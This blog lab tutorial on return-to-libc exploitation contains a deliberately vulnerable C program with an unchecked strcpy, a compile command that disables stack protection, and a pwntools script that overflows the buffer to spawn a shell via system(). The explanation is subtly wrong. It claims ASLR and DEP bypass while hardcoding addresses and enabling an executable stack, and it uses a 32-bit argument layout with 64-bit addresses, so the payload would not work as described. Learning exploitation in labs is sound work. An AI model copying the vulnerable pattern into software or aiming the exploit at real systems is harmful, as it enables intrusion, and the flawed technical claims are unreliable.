strangerRidingCaml
Return-to-Libc (RTL) Exploits Lab 본문
728x90
Return-to-Libc (RTL) Exploits Lab
In this lab, we will learn how to craft RTL exploits to bypass ASLR and DEP protections.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program executed successfully.\n");
return 0;
}
Save the above code to a file named vulnerable.c
and compile it with the following command:
$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to craft the RTL exploit.
from pwn import *
# Specify the path to the vulnerable binary
binary_path = './vulnerable'
# Address of system() function in libc
system_address = 0x7ffff7a33440 # Example address (change as per libc version)
# Address of "/bin/sh" string in libc
bin_sh_address = 0x7ffff7b989d7 # Example address (change as per libc version)
# Offset to return address
offset = 72
# Craft the payload
payload = b'A' * offset
payload += p64(system_address)
payload += p64(0xdeadbeef) # Fake return address
payload += p64(bin_sh_address)
# Launch the exploit
p = process(binary_path)
p.sendline(payload)
p.interactive()
Explanation of the Python script:
- We specify the addresses of the
system()
function and/bin/sh
string in libc. - The payload consists of padding, followed by the address of
system()
, a fake return address, and the address of/bin/sh
. - We launch the
vulnerable
binary and send the payload to trigger the RTL exploit. p.interactive()
allows us to interact with the spawned shell.
3. Exploiting the Vulnerability:
Execute the Python script to exploit the buffer overflow vulnerability:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful exploitation of the RTL vulnerability.
'System hacking' 카테고리의 다른 글
Return-Oriented Programming (ROP) Lab (0) | 2024.05.07 |
---|---|
Frame Pointer Overwrite Attacks Lab (0) | 2024.05.07 |
Frame Faking and Fake EBP Lab (0) | 2024.05.07 |
Return-to-Shellcode Attacks Lab (0) | 2024.05.07 |
Shellcode Development Lab (0) | 2024.05.07 |